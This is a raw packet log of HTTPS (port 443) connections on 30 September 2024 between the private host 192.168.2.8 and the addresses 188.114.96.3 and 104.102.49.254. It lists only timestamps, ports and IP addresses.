Sep 30, 2024 18:19:13.417370081 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.417387009 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.417423964 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.417423964 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.418770075 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.418811083 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.418843031 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.418863058 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.418904066 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.418904066 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.499684095 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.499731064 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.499809027 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.499818087 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.499855042 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.499877930 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.502266884 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.502310991 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.502372026 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.502382040 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.502398968 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.502418995 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.503190994 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.503232002 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.503281116 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.503281116 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.503290892 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.503336906 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.504091978 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.504134893 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.504158020 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.504174948 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.504187107 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.504215956 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.504673004 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.504713058 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.504777908 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.504777908 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.504785061 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.504837036 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.505085945 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.505127907 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.505150080 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.505157948 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.505177021 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.505224943 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.505301952 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.505348921 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.505384922 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.505390882 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.505403996 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.505450010 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.506563902 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.506632090 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.506712914 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.506764889 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.516783953 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.587244987 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.587264061 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.587405920 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.587419987 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.587491989 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.590158939 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.590178013 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.590245962 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.590254068 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.590310097 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.591227055 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.591248035 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.591293097 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.591300011 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.591341019 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.591341019 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.592653036 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.592669010 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.592727900 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.592736006 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.592780113 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.593002081 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.593017101 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.593074083 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.593076944 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.593087912 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.593158960 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.593158960 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.593250990 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.593272924 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.593321085 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.593329906 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.593343019 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.593596935 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.593641996 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.593668938 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.593671083 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:13.593743086 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.607537031 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:13.607554913 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.114531040 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.114598036 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.114660978 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.122972965 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.123008013 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.592457056 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.592525005 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.593907118 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.593919039 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.594177961 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.596393108 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.643394947 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.740510941 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.740550041 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.740585089 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.740612030 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.740638018 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.740745068 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.740765095 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.740811110 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.741000891 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.741054058 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.741080046 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.741095066 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.741102934 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.741142035 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.742042065 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.745589972 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.745636940 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.745647907 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.790182114 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.828658104 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.828952074 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.828994036 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.829015017 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.829062939 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.829094887 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.829099894 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.829111099 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.829144001 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.829149961 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.829797029 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.829821110 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.829842091 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.829849005 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.829883099 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.829889059 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.830580950 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.830619097 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.830626011 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.830634117 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.830666065 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.830672979 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.830701113 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.830739021 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.830745935 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.831530094 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.831573009 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.831581116 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.831691980 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.831721067 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.831728935 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.831734896 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.831777096 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.917749882 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.917814016 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.917840004 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.917855024 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.917865038 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.917879105 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.917900085 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.917926073 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.917956114 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.917965889 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.917995930 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.918028116 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.918036938 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.918108940 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.918158054 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.918196917 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.918201923 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.918241978 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.918766975 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.918797970 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.918811083 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.918817043 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.918838024 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.918855906 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.919953108 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.919996977 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.920010090 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.920047045 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.920052052 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.920066118 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.920094013 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.920480967 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.920525074 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.920533895 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.920572996 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.920695066 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.920739889 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.920747995 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.920784950 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.920789003 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.920829058 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.921555996 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.921582937 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.921610117 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.921617031 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:14.921638012 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:14.921652079 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.005758047 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.005796909 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.005820990 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.005837917 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.005861998 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.005881071 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.006171942 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.006221056 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.006333113 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.006375074 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.006494045 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.006536007 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.006592035 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.006628990 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.007039070 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.007102966 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.007622004 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.007657051 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.007666111 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.007672071 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.007692099 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.008069992 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.008101940 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.008115053 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.008121014 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.008142948 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.008152962 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.008169889 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.008189917 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.008196115 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.008215904 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.008316994 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.008351088 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.008358955 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.008363962 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.008387089 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.008879900 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.008924007 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.008932114 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.008963108 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.009013891 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.009052038 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.009054899 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.009066105 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.009089947 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.009109020 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.009295940 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.009329081 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.009341955 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.009347916 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.009368896 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.009382010 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.009885073 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.009932995 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.009963036 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.010000944 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.010122061 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.010154963 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.010164022 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.010169983 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.010189056 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.010205984 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.010821104 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.010870934 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.102838993 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.102915049 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.102988958 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.103033066 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.103116989 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.103174925 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.103176117 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.103204012 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.103230000 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.103708029 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.103754044 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.103765965 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.103790045 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.103822947 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.104154110 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.104197979 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.104213953 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.104228020 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.104250908 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.104573965 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.104617119 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.104629040 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.104650021 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.104676962 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.104832888 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.104876995 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.104892969 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.104906082 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.104926109 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.108059883 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.108100891 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.108118057 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.108129025 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.108150005 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.108630896 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.108669043 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.108684063 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.108711958 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.108728886 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.108793020 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.149490118 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.191354990 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.191447020 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.191487074 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.191543102 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.191668034 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.191728115 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.191740036 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.191765070 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.191783905 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.191803932 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.191924095 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.191978931 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.191982985 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.191994905 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.192078114 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.192145109 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:15.192189932 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.236408949 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:15.236437082 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:16.904220104 CEST	49710	443	192.168.2.8	104.102.49.254
